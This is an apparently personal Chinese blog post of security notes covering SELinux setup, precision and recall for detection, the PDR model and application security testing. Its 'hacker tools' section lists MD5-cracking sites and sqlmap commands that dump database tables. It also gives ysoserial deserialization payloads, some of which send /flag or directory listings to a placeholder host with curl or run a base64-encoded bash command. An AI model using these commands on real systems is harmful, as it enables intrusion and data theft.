selinux详解 黑客工具 准确率覆盖率 安全建设 网络安全模型 应用安全测试
- 2018-03-25 22:01:00
- admin
- 原创 2439
一、selinux详解
安全增强Security-Enhanced Linux简称SELinux,SELinux主要由美国国家安全局开发,主要作用是最大限度地减小系统中进程可访问的资源,是MAC访问控制的一种实现,2.6及以上版本的Linux内核集成了SELinux模块。
安装工具:
yum install policycoreutils-python,semanage在此工具包
yum install selinux-policy-targeted,policy-targeted基础模块
配置说明:
1、/selinux是一个类似/proc的虚拟目录,用于查看或设置selinux配置;
2、policy决定selinux对哪些进程管制,配置文件是/etc/selinux/config:
targeted,对大部分网络服务进程进行管制,系统默认使用此政策;
minimum,以targeted为基础,仅对选定的网络服务进程进行管制;
mls,多级安全保护,管制所有进程,最严格的政策,配置难度很大;
3、selinux状态:enforcing开启、permissive仅告警不拦截、disabled禁用
查询selinux状态,getenforce或sestatus命令;
临时设置selinux状态,setenforce只能设置Enforcing和Permissive状态;
永久设置selinux状态,编辑/etc/selinux/config,然后重启系统;
4、改变配置项:setsebool httpd_can_network_connect 1,允许httpd访问网络;
二、黑客工具
黑客必用系统:Kali Linux
MD5破解:
1、MD5计算:https://www.bejson.com/enc/md5
2、MD5破解:https://www.cmd5.com
3、MD5破解:https://www.cmd5.org
4、MD5破解:https://10015.io/tools/md5-encrypt-decrypt
站点目录暴破:
1、暴破工具:dirsearch
2、下载地址:https://github.com/maurosoria/dirsearch
3、安装依赖:%Python3%\Scripts\pip.exe install -r requirements.txt
4、参数说明:-w指定扫描路径文件,-e指定扫描后缀列表,-f强制增加后缀;
5、使用示例:dirsearch.py -u url
SQL注入工具:
1、注入工具:sqlmap
2、下载地址:https://sqlmap.org
3、帮助文档:https://github.com/sqlmapproject/sqlmap/wiki/Usage
4、参数说明:flush-session删除本地历史缓存数据,batch使用默认执行参数;
5、使用示例1:sqlmap.py -u url --flush-session --batch
6、使用示例2:sqlmap.py -r reqfile --flush-session --batch
SQL注入命令:
1、sqlmap.py -u URL --dbs
2、sqlmap.py -u URL --current-db
3、sqlmap.py -u URL -D dbname --tables
4、sqlmap.py -u URL -D dbname -T tbname --columns
5、sqlmap.py -u URL -D dbname -T tbname -C c1,c2,c3 --dump
反序列化命令构造工具:
1、构造工具:ysoserial
2、下载地址:https://github.com/frohoff/ysoserial
3、读取文件命令构造:java -jar ysoserial.jar ROME "curl http://ip:port -d @/flag" | base64 -w0
4、读取目录命令编码:echo "ls / | base64 -w0 | xargs curl http://ip:port -d" | base64 -w0
5、任意命令构造:java -jar ysoserial.jar ROME "bash -c {echo,base64(cmd)}|{base64,-d}|{bash,-i}" | base64 -w0
三、准确率覆盖率
总体样本:A
坏人集合:M
扫描坏人:N
准确率=M∩N/N
覆盖率=M∩N/M
扫描说明:
1、准确率覆盖率很难同时达到100%;
2、总体样本很大,坏人集合很小,通常扫描坏人会很困难;
四、安全建设
1、安全有三道防线,第一道安全,第二道风险,第三道审计;
2、红蓝对抗,红军负责防守,蓝军负责攻击,企业内部的攻防演练;
五、网络安全模型
PDR模型:
1、Protection保护,采用各种措施来保护网络、系统、数据,保护方法包括:加密、认证、访问控制、防火墙、防病毒;2、Detection检测,观察网络和系统的状态,给安全防护和响应提供依据,检测技术包括:入侵检测 、漏洞检测、网络扫描;
3、Response响应,解决安全问题就是解决紧急响应和异常处理,建立应急响应机制和快速安全响应能力,对网络和系统很重要;
4、保护时间>=检测时间+响应时间,则系统安全;
六、应用安全测试
1、SAST,Static Application Security Testing,静态应用程序安全测试,检测源代码的白盒测试;
2、DAST,Dynamic Application Security Testing,动态应用程序安全测试,检测服务的黑盒测试;
3、IAST,Interactive Application Security Testing,交互式应用程序安全测试,需要注入到应用程序;